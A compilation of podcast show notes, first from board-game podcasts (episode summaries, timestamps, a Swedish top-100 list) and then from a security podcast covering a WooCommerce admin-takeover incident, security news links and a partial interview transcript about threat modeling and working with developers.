This week Steve shares his recent experience of playing Smartphone Inc and he had a blast discovering new technology and engaging in patent-wars in the economic simulation Eurogame. Jules dons his evil-Jules cloak and twirls his moustache as he reveals that he loves nothing more than crushing his opponents' Viking armies on Blood Rage. Mitch details his nail-biting finishes in the one-vs-many hidden movement game Specter Ops.   A popular measure in the board gaming community is the complexity of a game, which is often described as 'heavy' or 'light'. But does 'heavy' mean difficult? In the Topic of the week, the team discuss the weight of games, their favourite heavy games, and how to overcome the perceived entry barrier.   In our Board Game Bracket segment, we wrap-up some previous match-ups: Spyfall vs It's A Wonderful World, Arkham Horror 3rd Ed vs Mysterium, and Arkham Horror LCG vs Inis. And then we unleash our latest battle - Fleet: The Dice Game vs Champions of Midgard. It's Steve vs Mitch in this battle of Viking clans defending a town against an onslaught of trolls, vs ... well, fishing. Yeah, so there's that. (Let's be honest, when even the recording equipment falls asleep during your pitch, you know you're in trouble, Mitch!) In our Swear and Oath segment, Jules fulfilled his oath by playing Lords of Scotland and raises the bar with The Estates. Mitch failed to play Circle the Wagons, but successfully manage to plug Vyper Hyper playmats about 5 times in the space of a minute. He then doubles down with the sci-fi epic Anachrony. And Steve found Arkham Horror: The LCG very Conor-ish (which could be a compliment or not), and vows to play Xia: Legends of a Drift System before the debt collectors come knocking on his door. Sizzling Games: Smartphone Inc (2:18), Blood Rage (14:33), Specter Ops (22:45) Topic of the Week: What is a Heavy Game? (32:54) Board Game Bracket (59:42) Swear An Oath (1:17:07) **BOARDGAMEBBQ.COM** Board Game BBQ | Board Game Podcast    boardgamebbq.com Head on over to the Board Game BBQ website for links to previous episodes, more information on all of the games mentioned, and upcoming events. **JOIN OUR DISCORD!** The BGBBQ now has a Discord Channel. Want to join the community and chat with the team and other listeners about your favourite hobby? Like to get updates when our podcasts are released, and get exclusive content? Need a place you can chat with other players while you're playing your own online games, overlooking for some like-minded gamers to play online with? Well, here's your invite: https://discord.gg/rzQxJyR **FACEBOOK COMMUNITY** Log into Facebook | Facebook Log into Facebook to start sharing and connecting with your friends, family, and people you know.  www.facebook.com Why not join The Board Game BBQ Community page on Facebook. It's a place where everyone can post about their games, write reviews, engage with the community, and support each other. Regardless of if you are a casual gamer, a designer, an artist, a content creator - everyone is welcome! **INSTAGRAM** Login • Instagram Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.  www.instagram.com Follow us on Instagram to be notified when a new episode drops, or when our Discord events are happening. And don't forget to use #oathfulfilled when you finally get a game off your shelf of shame. --- Join in the conversation on our Facebook on Instagram pages, or drop us a line at podcast@boardgamebbq.com If you enjoy the podcast please consider leaving a short review on your podcast app of choice. Your feedback will help us improve the podcast, and we might even read your review out on the show!

In our one hundred and twenty-ninth episode, Aaron is still all alone so he talks about some ways he’s been enjoying gaming from home and he reflects on our review of Specter Ops from 100 episodes ago. Then Aaron is joined by Brendan, Robb, and Scott as they review the legacy-style negotiation game King's Dilemma. This episode is sponsored by Board Game Bliss

Which games transport us to new places or worlds? What makes a good asynchronous digital game? And how does sheltering in place change how a designer goes about his business? Board game designer Emerson Matsuuchi (Century series, Metal Gear Solid, Specter Ops) joins us to discuss. Here's a full list of games discussed on the show: Intro Century Metal Gear Solid Foundations of Rome Christina's topic: What are your top board games that help you escape? Tokaido Namiji Tales of Arabian Nights Hive Mind King of Tokyo Mansions of Madness Robinson Crusoe: Adventures on the Cursed Island Dead of Winter Above & Below Near & Far Mice & Mystics Aftermath Forgotten Waters Suburbia Emerson's topic: How important is it for a game to have something innovative? The Mind Dead Man's Cabal In the Hall of the Mountain King The Castles of Burgundy Lost Cities Codenames Paladins of the West Kingdom Architects of the West Kingdom Nick's topic: Asynchronous digital games The Castles of Burgundy Lost Cities Carcassonne Patchwork Ticket to Ride Tokaido Ascension Shards of Infinity Lords of Waterdeep Kingsburg Shoe's topic: How does shelter-in-place impact game design work? Infiltrator Final thoughts Just One Rising Sun

Pick Up & Deliver 221: Locke & Key (Themestorm) - Brendan ponders what a game built on the comic book and/or show Locke & Key would be like.

Pick Up & Deliver 221: Locke & Key (Themestorm) - Brendan ponders what a game built on the comic book and/or show Locke & Key would be like.

Pick Up & Deliver 221: Locke & Key (Themestorm) - Brendan ponders what a game built on the comic book and/or show Locke & Key would be like.

Pick Up & Deliver 221: Locke & Key (Themestorm) - Brendan ponders what a game built on the comic book and/or show Locke & Key would be like.

I det här special avsnittet så går pappa Micke och HCM Marcus Brisse Brissman igenom sina top 100 brädspel. Nu fortsätter dom med nr 60-41. Vid top 10 kommer HCM Tomas att joina dom :D. Spel som nämns: Empires: Age of Discovery, Vampire: The Eternal Struggle, Village, Istanbul, Time's Up! Title Recall!, Joking Hazard, Star Wars: Rebellion, Warhammer: Invasion, Gloomhaven, Specter Ops, Santa Maria, Jaipur, Azul, Hollywood, Keyflower, 7 Wonders Duel, Mobster Metropolis, Legacy: The Testament of Duke de Crecy, That's Pretty Clever, Teenage Mutant Ninja Turtles: Shadows of the Past, Letnisko, Orléans, Planet, Trails of Tucana, Crown of Emara, Race For The Galaxy, Jump Drive, Rajas of the Ganges, Deception: Murder in Hong Kong, Dead of Winter: A Crossroads Game, Draftosaurus, Game of Thrones: Westeros Intrigue, Point Salad, The Big Idea, Colosseum, Roll Player, Coup, The Golden Sails, Junk Art, Bloodrage, Android Netrunner, Orléans Stories, Monikers, Cards Against Humanity, San Juan, Tiny Towns, Warhammer Conquest, bloodbowl team manager, Blood Bowl, Descent, Fury Of Dracula, Letters from Whitechapel, Key To The City Of London, Patchwork, Dungeons And Dragons, Godfather Don Corleons Empier, Twice As Clever, Spyfall, Viceroy, Hemsidan till att ranka sina top 100 brädspelhttps://rankingengine.pubmeeple.com/?fbclid=IwAR3OZPtgDvKPcoQ-17HqPFuOpzpvIvD5vzPGsn7-UQmMfn_tAOii4yiMfkg Mickes Lista60. Empires: Age of Discoveryhttps://boardgamegeek.com/boardgame/173442/empires-age-discovery59. Vampire: The Eternal Strugglehttps://boardgamegeek.com/boardgame/2122/vampire-eternal-struggle58. Villagehttps://boardgamegeek.com/boardgame/104006/village57. Istanbulhttps://boardgamegeek.com/boardgame/148949/istanbul56. Time's Up! Title Recall!https://boardgamegeek.com/boardgame/36553/times-title-recall55. Joking Hazardhttps://boardgamegeek.com/boardgame/193621/joking-hazard54. Star Wars: Rebellionhttps://boardgamegeek.com/boardgame/187645/star-wars-rebellion53. Warhammer: Invasionhttps://boardgamegeek.com/boardgame/47185/warhammer-invasion52. Gloomhavenhttps://boardgamegeek.com/boardgame/174430/gloomhaven51. Specter Opshttps://boardgamegeek.com/boardgame/155624/specter-ops50. Santa Mariahttps://boardgamegeek.com/boardgame/229220/santa-maria49. Jaipurhttps://boardgamegeek.com/boardgame/54043/jaipur48. Azulhttps://boardgamegeek.com/boardgame/230802/azul47. Hollywoodhttps://boardgamegeek.com/boardgame/904/dream-factory46. Keyflowerhttps://boardgamegeek.com/boardgame/122515/keyflower45. 7 Wonders Duelhttps://boardgamegeek.com/boardgame/173346/7-wonders-duel44. Mobster Metropolishttps://boardgamegeek.com/boardgame/199646/mobster-metropolis43. Legacy: The Testament of Duke de Crecyhttps://boardgamegeek.com/boardgame/52461/legacy-testament-duke-de-crecy42. That's Pretty Cleverhttps://boardgamegeek.com/boardgame/244522/s-pretty-clever41. Teenage Mutant Ninja Turtles: Shadows of the Pasthttps://boardgamegeek.com/boardgame/180771/teenage-mutant-ninja-turtles-shadows-past Marcus Lista60. Letniskohttps://boardgamegeek.com/boardgame/126000/letnisko59. Orléanshttps://boardgamegeek.com/boardgame/164928/orleans58. Planethttps://boardgamegeek.com/boardgame/252929/planet57. Trails of Tucanahttps://boardgamegeek.com/boardgame/283864/trails-tucana56. Crown of Emarahttps://boardgamegeek.com/boardgame/256570/crown-emara55. Race for the Galaxy (/Jump Drive)https://boardgamegeek.com/boardgame/28143/race-galaxyhttps://boardgamegeek.com/boardgame/205597/jump-drive54. Rajas of the Gangeshttps://boardgamegeek.com/boardgame/220877/rajas-ganges53. Deception: Murder in Hong Konghttps://boardgamegeek.com/boardgame/156129/deception-murder-hong-kong52. Dead of Winter: A Crossroads Gamehttps://boardgamegeek.com/boardgame/150376/dead-winter-crossroads-game51. Draftosaurushttps://boardgamegeek.com/boardgame/264055/draftosaurus50. Game of Thrones: Westeros Intriguehttps://boardgamegeek.com/boardgame/155693/game-thrones-westeros-intrigue49. Point Saladhttps://boardgamegeek.com/boardgame/274960/point-salad48. The Big Ideahttps://boardgamegeek.com/boardgame/696/big-idea47. Colosseumhttps://boardgamegeek.com/boardgame/27746/colosseum46. Santa Mariahttps://boardgamegeek.com/boardgame/229220/santa-maria45. Roll Playerhttps://boardgamegeek.com/boardgame/169426/roll-player44. Legacy: The Testament of Duke de Crecyhttps://boardgamegeek.com/boardgame/52461/legacy-testament-duke-de-crecy43. Couphttps://boardgamegeek.com/boardgame/131357/coup42. The Golden Sailshttps://boardgamegeek.com/boardgame/193327/golden-sails41. Junk Arthttps://boardgamegeek.com/boardgame/193042/junk-art Våra länkarHemsidahttps://mindy.nu/Facebookhttps://www.facebook.com/Mindypodd.nu/Twitterhttps://twitter.com/MindyPoddYoutubehttps://www.youtube.com/channel/UCmOr6MyeugbWX_VnckgGkDQ?view_as=subscriberInstagramhttps://www.instagram.com/mindypodd/?hl=svVår Patreonhttps://www.patreon.com/user?u=2776677Mickes MailMicke@mindy.nuTomas Mailconradargo@gmail.comMarcus Mailbrisse@spelraido.seTomas LänkarFacebookhttps://www.facebook.com/groups/205615756115993/Youtubehttps://www.youtube.com/channel/UCFyJceQ4JsiUhkS04K29CrgInstagramhttps://www.instagram.com/conradargo/?hl=svTwitterhttps://twitter.com/ConraDargoMarcus LänkFacebookhttps://www.facebook.com/spelradio/Hemsidahttp://spelradio.se/page/7/?fbclid=IwAR1qsAuQbPaViCaNdAaRjAhcCSH-tcZxDOFjQJ1h1B_KWpZB8THkoP_SZbw

In Episode 28 we talk about some of our recent plays. We review the latest Alexander Pfister game Maracaibo. Then we discuss some of the top games on BoardGameGeek numbers 100-76.    00:58 Everdell  7:43 Codenames: Pictures  8:44 Flamme Rouge  11:50 Race For the Galaxy  13:19 Qwirkle 14:15 The Taverns of Tiefenthal  23:29 Just One  29:20 Targi  31:41 Specter Ops  39:07 Maracaibo Review 1:29:25 BGG top 250 #100-76

Ambie and Crystal discuss Letters from Whitechapel, Trogdor, and Gem Hens. We then talk about hype in board games and whether it's good or bad, or both. Announcements: 0:43 Recent Games: 1:48 Hype: 13:42 Outro: 29:17 Bloopers: 30:30 Letters from Whitechapel: https://boardgamegeek.com/boardgame/59959/letters-whitechapel Trogdor!! The Board Game: https://boardgamegeek.com/boardgame/255907/trogdor-board-game Gem Hens: https://boardgamegeek.com/boardgame/260015/gem-hens

Announcements: https://www.workshopcon.com/     SpecterOps (red Team operations) and Tim Tomes (PWAPT)   Bsides Nashville   https://blog.secureideas.com/2019/04/we-take-security-seriously-and-other-trite-statements.html   “We take security seriously and other trite statements“   Wordpress infrastructure (supply chain failure)     WordPress plugin called Woocommerce was at fault.     Vuln late last year: https://www.bleepingcomputer.com/news/security/wordpress-design-flaw-woocommerce-vulnerability-leads-to-site-takeover/     “According to new research by Simon Scannell, a researcher for PHP Security firm RIPS Tech, when WooCommerce is installed it will create a Shop Manager role that has the "edit_users" WordPress capability/permission. This capability allows users to edit ANY WordPress user, including the Administrator account.”   “https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/”   You (Kevin) discovered the admin accounts, but could not remove them. Was that when you considered this an ‘incident’?   Timeline:“[2019-03-22 09:03 EST] Kevin assigns members of the Secure Ideas team with reconnaissance and mapping of the AoM system. Kevin reminds these members that Secure Ideas doesn’t have permission to test AoM. They are advised not to do anything that could harm the AoM’s production environment.”     What is the line they should not cross in this case?   You did not have access to logs, you asked that an audit plugin be installed to be able to view logs. Is that permanent, and why did they not allow access to logs prior to?   [2019-03-22 13:11 EST] AoM Support fixes the audit log plugin access. AoM Support has found that a purchase of a course through a Woocommerce plugin resulted in users being granted admin access. AoM Support provides specific order numbers. They have also done an analysis of the database backups from the last 60 days and believe that the attackers did not do anything after they got access. AoM Support announces that the Secure Ideas training site will be set up on a separate server and Secure Ideas will be granted a new level of access.   Seems like working with AoM wasn’t difficult. Was giving you access to your own instance, and allowing you to administer it a big deal for them?   Lessons Learned? Anything you’d do differently next time?     Update IR plan?     Did they reach out for additional testing?     Did the people who got admin get removed?     Consult with AoM on better security implementation? Your env wasn’t damaged, but did they suffer issues with other customers? *answered*   https://www.wordfence.com/   https://en.wikipedia.org/wiki/Gremlins   Gas Station skimmer video - https://www.facebook.com/michellepedraza.journalist/videos/2135141863465247/   https://www.helpnetsecurity.com/2019/04/12/cybersecurity-incident-response-plan/ https://www.guardicore.com/2018/11/security-incident-response-plan/   https://www.zdnet.com/article/security-risks-of-multi-tenancy/   Upcoming SI events IANS forum (Wash DC) ShowmeCon Webcasts ISC2 security Congress (Wash DC)   Patreon Slack Twitter handles iTunes Google   Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel:  http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site:  https://brakesec.com/bdswebsite #iHeartRadio App:  https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec  

Announcements: WorkshopCon Training with SpecterOps and Tim Tomes www.workshopcon.com redteam operations with SpecterOps PWAPT with Tim Tomes   Source Boston: [Boston, MA 2019 (April 29 – May 3, 2019) (https://sourceconference.com/events/boston19/)Trainings: April 29 - April 30, 2019 | Conference: May 1 - 3, 2019   Cybernauts CTF meetup in Austin Texas at Indeed offices, 23 April at 5pm Central time. https://nakedsecurity.sophos.com/2019/04/02/wrecked-teslas-hang-onto-your-unencrypted-data/   My last car sync’ed the contact list. Video is a different story, but safety for the vehicle and owner, they’ll probably continue to store it. Telemetry data is for changing road conditions, navigation, etc Enable encryption at rest… or pop a fuse to scram the data when/if an accident is detected     Level of difficulty, no fuse, requires hardware upgrade     Encryption at rest, ensuring HTTPS on all incoming/outgoing.   https://www.bleepingcomputer.com/news/software/major-browsers-to-prevent-disabling-of-click-tracking-privacy-risk/     Annoying “do you want notifications from this site?”     Like an annoying RSS feed… ‘Hey, we added a new banner ad!’ https://www.phoronix.com/scan.php?page=news_item&px=Linux-Improve-CPU-Spec-Switches     Why add the switches to allow vulnerabilities?     Slippery slope  --disable-dirtycow?   https://www.bleepingcomputer.com/ransomware/decryptor/planetary-ransomware-decryptor-gets-your-files-back-for-free/   https://www.wamc.org/post/details-still-few-city-albany-s-ransomware-attack Threat intelligence and software detections… Got an email… *Story Time from Mr. Boettcher* Twitter: why do companies not allow copy/paste in password fields? Tesla

Thanks to all of our awesome Patreon supporters, the Dukes are able to bring you additional interviews of publishers, designers and board game media personality for our Holding Court episodes. This episode, Alex sits down with Emerson Matsuuchi - the designer of Specter Ops, Century Spice Road and the upcoming Metal Gear Solid from IDW Games! The two discuss board game design and of course what flavor of ice cream Emerson would be! Click here to       Twitter: @dukesofdice Facebook: /dukesofdice Dukes of Dice YouTube ChannelSubscribe on iTunes  

  Log-MD story     SeaSec East meetup     Gabe (county Infosec guy) https://www.sammamish.us/government/departments/information-technology/ransomware-attack-information-hub/ New Slack Moderator (@cherokeeJB) Shoutout to “Jerry G”   Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407 www.Workshopcon.com/events and that we're looking for BlueTeam trainers please   Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet   Noid - @_noid_ noid23@gmail.com   Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3 Slides (PDF) https://github.com/noid23/Presentations/blob/master/BSides_2019/Its%20Not%20a%20Bug%20Its%20a%20Feature%20-%20Seattle%20BSides%202019.pdf   Security view was a bit myopic? “What do we win by playing?” Cultivating relationships (buy lunch, donuts, etc) Writing reports Communicating findings that resonate with developers and management     Often pentest reports are seen by various facets of folks     Many levels of competency (incompetent -> super dev/sec) Communicating risk? Making bugs make sense to everyone… The three types of power: https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1 (yas!)   Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel:  http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site:  https://brakesec.com/bdswebsite #iHeartRadio App:  https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec Transcription (courtesy of otter.ai, and modified for readability by Bryan Brake) Bryan Brake 0:13 Hello everybody this is Bryan from Brakeing Down Security this week you're gonna hear part two of our interview with Noid, we did a lot of interesting discussions with him and it went so well that we needed the second week so for those of you here just catching this now Part One was last week so you can just go back and download that one. We're going to start leading in with the "one of us" story because one of the one of the slides he talked about was how you know he you know learned how to be one with his dev team and one of the last topics we had was kind of personal to me I do a lot of pentest writing for reports and stuff at my organization "Leviathan" and and you know, we talked about you know What makes a good report how to write reports for all kinds of people, whether it be a manager that you're giving it to, from an engagement for a customer, or, you know, the technical people who might be fixing the bugs that an engagement person might find, or a pen tester might find in this case. So, yeah, we're we're going to go ahead and lead in with that. Before we go though, SpectreOps is looking for people to go to their classes. They're learning adversary tactics and red team Operations Training course in Tysons Corner, Virginia. It's currently $4,000 to us and it's from April 23, April 26 of this year 2019. That doesn't include also airfare and hotel, so you're gonna have to find your way to Tysons Corner the Hyatt Regency there's a link in the show notes of course to the to the class if you'd like to go You'll learn things like designing and deploying sophisticated resilient covert attack infrastructure, gaining initial access footholds on systems using client side attacks, and real world scenarios cutting edge lateral movement methods to move through the enterprise and a bunch of other cool things... so yeah if you're interested in and hooking that up you can you there's still you still got more than a month to sign up for it it looks like there might still be tickets so knock yourselves out they're also looking for blue team people. "Mike P" on our Slack channel, which will tell you about the end of the show here on how to join if you'd like, he said http://www.workshopcon.com/events they're looking for blue team trainers... you can hang out with folks like you know, SpecterOps and Tim Tomes (LanMaster53) as well there when you you know we can you sign up for the blue team stuff and yeah http://www.workshopcon.com/events and then you can you know learn to be a blue team trainer or actually give blue team training if you so choose. So that said it's pretty awesome. Alright, so without further ado, we're going to get started with part two of our interview with Noid here, hope you have a great week. And here we go. Okay. So I think we've gotten down to like the "one of us" story. So we're in our hero finally starts to get it and begins to bridge the gap. Some of the things some of the points are the lessons learned in this story. And you can tell us about story was that language makes all the difference in the world. This is what got me on to the part about the reporting, which we'll talk about a little while, but maybe you could fill us in on this discovery, this the story that got you to these points. Brian "Noid" Harden 3:37 Okay, so the team I'm working on I get asked the the thing in question is it was a pretty massive product and it had never had any threat modeling done, Bryan Brake 3:50 okay. Brian "Noid" Harden 3:51 So had never had any threat modeling done and this this particular product was made up of tons of little sub products. So what I did is I sat there first in a kind of a complete panic going, this is overwhelming. I don't have nearly enough time or resources to be able to do this. But you know how to eat the elephant, right? The small pieces and get at it. So I had one dev lead, who I know, had worked previously on a security product. And he was a nice guy. So I sat down with them and basically said, "Hey, could you walk me through visually diagramming how your service works, building that data flow diagram, and then we're going to talk about it from a security perspective". And he was sort of like, oh, that'd be fun. Yeah, let's do that. And so we sat there and he diagrammed and the whole time he's diagramming, he'd stop and erase things and go, Wait, no, no, we were going to do it that way. But we didn't. And then oh, and we stopped doing it this way, because we added this other thing and we had to be able to break communication out number channels and then he stopped at one point and was like, get a picture of this was like I think this is probably the most accurate diagram of our service we've ever had. And then when we started doing the threat modeling side of it, like, you know, talking about trust boundaries and you know, it's like all right, so what makes sure that you know data from point A to point B and it's not filled with that kind of thing? And I'm saying okay well, could you could you you know, do this over HTTPS rather than just regular HTTP Bryan Brake 5:29 right Brian "Noid" Harden 5:31 you know you get non repudiation you know, and it's like, not talking about even the security value of it, but talking more about the you know, you the integrity be there and then at one point, he stops and he looks at me and he says, Man, I never had a threat modeling would generate so much feature work. And in my mind, I was like, talking about feature work like, these are bugs you need to fix. Now, all of a sudden, it was like, Oh, crap, I've been approaching this entirely the wrong way my entire career. Devs look at things that have looked at depth look at things from bug fixing, and feature development. And as a security person, what i, every time I'd been bringing up stuff they needed to do in my mind, it was implied it was feature development. But they saw this bug fixing, because in the "dev world" security fixes or bug fixes. He saw the value here and went, Oh, this is going to generate a ton of feature work. And it's like, oh, so I gotta stop calling the security work. I've got to start calling this feature work. And sure enough, not only if you start calling it feature work. And of course now once you're talking about feature work, you can start talking about the drivers. Why are we building a feature because you know, you don't build features nobody wants. Unless you're certain software companies. But yeah, but you build.. you build features that come out of customer requests, you know, you get features that hey, you know, I look at things like say Microsoft Office, how that's evolved over the years. And that's because people who use Office come back and say, you know, this is really cool. But I'd really like it if when I'm giving my PowerPoint presentation, I had a timer on the screen. So I know I'm on mark, you know, and Okay, that's a feature requests. And so that's how these things evolve. And so once I started talking about security work from the perspective of feature development you know, we have existing features that need to be worked on to give them new functionality in order to be able to pick up new customers and we have new features that we need to build that will also help because the other thing too I also noticed is that well... well I care about things like confidentiality and integrity. Devs care about things like availability and performance, right, these two these two things can kind of be almost used interchangeably, depending on the circumstance, so when, when devs are talking about stability, I'm thinking about integrity. When I'm when I'm talking about availability, they're, they're thinking about performance. And so all of a sudden, I'm now giving them ideas for like new proof counters, basically, like new metrics to check the health of the thing that we're building. And the way I looked at it was almost... Yeah, this is what this is the business driver for the, you know, customer X wants it customer Y needs it, you know, and here's the benefit, you know, the product gets out of it. Here's the benefit that developers get out of it. And what a security get out of it? Hey, don't worry about it. Purely, purely any value I derived from this work is purely coincidental. Brian Boettcher 8:57 *Chuckles* Brian "Noid" Harden 9:00 And that, in turn, helps start driving the conversation a lot better. Because the other value I got out of it, too is by having somebody on the development side of the house who had a name and had some, you know, reputation behind him, he was able to go to his respective peers and say, Man, I did this thing with Noid and it was really valuable. And we got a lot of cool stuff out of it. So he's gonna hit you up about it. And I totally recommend doing Bryan Brake 9:27 right Brian "Noid" Harden 9:28 and at which point because because some of the folks I worked with were either indifferent towards me, they were just busy. I did have some folks that I work with, though, that were just flat out adversarial towards me. They frankly they didn't want me doing what I was doing. They didn't really want me parking and poking around like the dark corners of the product. You know, because it was going to make work, but having somebody on their side say, No, I actually got value out of this. Okay, well, I'll give it a try. Holy crap, I got value out of this, too. So that was that was where I suddenly realized that my languagein my mind, I'm not saying anything differently. But yet, it turns out that when it comes to the words coming out of my mouth and how they were being received, it radically changed how I was expressing myself to people. And it totally changed the response I got. Brian Boettcher 10:26 So maybe we need a new "CIA" triad that has the other words on it, you know, the, the translated words for development and product teams, Brian "Noid" Harden 10:35 possibly! Bryan Brake 10:36 performance... integrity is stability. Brian "Noid" Harden 10:43 Yeah, stability. availability... Bryan Brake 10:48 What's confidentiality then? what does the other bit that they talk about or worry about? Brian "Noid" Harden 10:52 I don't know if only we had a dev lead on this call. Brian Boettcher 10:55 *chuckles* Bryan Brake 10:56 Yeah. Do you know one? *laughs*. So, so the lessons learned, you said, language makes all the difference. You know the way you speak is like, you know, if you're, if you only know English, like most Americans and go over to France, speaking louder in English to somebody who only speaks French is not going to help here to help you so "look for the helpers" So let's say you don't, let's say we're not lucky enough to have somebody like the person you found in your organization is is it it's going to take a little bit longer maybe to get them onto your side to you know, poke at him like that or, you know, maybe grease the wheels with some donuts or you know, maybe take them to lunch or something. Would that be helpful at all? Brian "Noid" Harden 11:35 Well, first off Yes, you'd be amazed at how much showing up with donuts Bryan Brake 11:48 Oh, I know Brian "Noid" Harden 11:49 Oh yeah. No, actually actually it's funny too because I actually just a couple of weeks ago and other team at my company came over and gave my team donuts They gave my team the IT team and the tech team donuts because of all the work we've been putting in form... as far as I'm concerned. Yeah, I'll march directly into hell for those people right now, because they gave me donuts... Bryan Brake 11:56 niiiice. they better be Top Pot donuts or something legit not like... Brian "Noid" Harden 12:13 Oh, yeah, they were. They were Top Pot donuts. But yeah, so part of its that something else, too is doing some of the work yourself. So, in addition to all this work I'm doing I'm also managing the development of security features. And I had gone over the product spec for one of these security features. And I built a data flow diagram. And then during one of my little weekly Scrum meetings where I sit down with my devs. I showed it to them. and I remember one of them to and he immediately stopped and was like, "What is this?" He's like, "what is this doesn't make sense", Bryan Brake 12:53 This is forbidden knowledge This is your thing. Brian "Noid" Harden 12:56 Yeah, you wrote this. Okay, you wrote this, this is just a visual representation of the thing that you wrote. And once I explained it him, sort of the steps one through eleventy, you know, and showed him what had happened. He was sort of like a "Oh, that's interesting". Still somewhat dismissive of it, but it was still kind of a file. So in addition to, you know, buttering people up with donuts, and lunch and things like that, but also sometimes you gotta just buckle down and do it yourself, and then show the value. And I mean, I'll be blunt. That's how I've gone by through most of my career is when I can't get traction. I'll go do it. And then pop up and go. Hey, guys, check this thing out. Oh, wow. That's really neat. How do you do that? Where did you do that? It's like oh, you can do it too. Right now I can show you how I can work with you on it. I'm certainly not going to tell you to RTFM and walk out of the room. So part of it is it also shows a little bit of commitment on your part, sort of one of the things I've picked up that security, not even in the equation here. But just having worked in a lot of software development organizations with the devs and the PMs is the devs is frequently see the PM is not doing anything of value except for when you are. So when you are willing to put that kind of effort into deliver something like that, like, Hey, I thought modeled our service,it sort of shows this, "oh, I take it back. All those things I said about you know, you're not worthless after all." So there's definitely some value there too, because a lot of times too people are willing to say because it's easy to stand back and issue edicts, it's easy to stand back and just, you know, get up on your soapbox and tell everybody else what to do. But when you're when you show you're willing to eat your own dog food. That really gets people's attention because it's like, "Okay, this dude clearly cares about this a lot" And now that he's done it, I see what he's talking about. Yeah. You know, like we should do that there's value here. Bryan Brake 15:11 So very cool. Yeah. So when you on the last slide here, when you wrapped it all up, you said engage early and often... Does it have to be so when we're talking about communication, open communication, trying to, you know, some of its, you know, cultivating relationships. So, you kind of need to, you know, if you're introverted, you kind of need to step out of your shell a little bit and go and talk to people, get out of your cubes for once a while. Turn on the lights, that kind of thing. How often did you talk with these teams to help build this relationship after a while, because obviously there had to be some team building there? Brian "Noid" Harden 15:48 Yeah, so in my case, since I was in the team, we thought weekly, okay, weekly, and sometimes daily because they were literally down the hall from me, right, but in terms of where I've had to work in other organizations Where I've been in back in a centralized organization and having to work with remote teams or work with teams that I'm telling them to do things but I'm not in their org... like a weekly basis okay like we're going to meet up this weekbecause like for example like when I was a back when I was at Microsoft I worked in the MSRC before I left yeah and I was handling me and another guy we're handling all the (Internet Explorer)IE cases. Okay. That was a lot of cases because there's a lot of versions i right. So we would go meet with those cats once a week. And we would sit down with them and say, Okay, here's here's the queue. Here's what's new from last time. You know, here's sort of what we think is the priority for fixing things you know, what do you think about it, but it's it's that you always want them to know who you are, and you want them to know that you're just as busy as they are, and that you end that you're also respectful of their time, right? You know, so we'd make the meeting short... personal pet peeve of mine are people that set meetings deliberately long with the expectation of all just go ahead and give everybody 30 minutes. I'll give everybody 30 minutes back, right? Like, well thanks jerk. Like how about you could have just made a 30 minute meeting in the first place? You know it just tells that that that tells me you're not that doesn't tell me you're a magnanimous person that tells me you can't manage your time, you know. So I try to be really concise. Like, I'm going to set up a meeting with these devs. I'm going to include them agenda in the meeting invite. I'm going to set it for exactly how long I think it's like we're going to 30 minute meeting, you know, 30 minute meeting to go over the bugs that are in the queue. There's four new ones from last week one of them's really nasty, you know, that probably is probably going to be a non negotiable.. You know, but the other three are up for negotiation and you show up you sit down with them you know some pleasantries and then you just, you get to work and then you get them back out doing their thing and you get back to your thing. And that really flows well... It really flows well because, you know, none of us like meetings. And the closer you are to touching computers, the more meetings disrupt your flow the more they just disrupt your life and the thing that you're effectively getting usually paid a lot of money for.And so by kind of doing it that way, you keep that cadence up to keep that that sort of friendship and that that rapport up but the other thing too is a another point I wanted to make, but I'm getting tired... but yeah, but but along those lines to Yeah, yo get that rapport there. You're respectful of their time and then you... I can't remember what I was going to say next. Bryan Brake 19:20 So the last bit was, let's see, don't talk about securities, talk about feature development. We talked about that threat modeling your developers, you and Dr. Cowan, my, my car pool buddy, you and Crispin need to you know get get together and talk about the the threat modeling he's doing... he doesn't do trust boundaries so much, one of the talk he gave at SeaSec East was about how we do threat modeling in our organization but a lot of companies are starting to see value in that before we do engagements because we can prioritize what's the more important thing to test versus just testing all the things in the environment Brian "Noid" Harden 19:42 Threat modeling and software development is huge too, like that was one of the one of the things I think a lot of my developers I've done this with over the years have taken away from it is one you have to make it fun... You can't make a complete slog. But one of the nice things about threat modeling, is when you're visually looking at the thing you're going to build, that's when you make the realization that like, Oh, hey, my post office has no 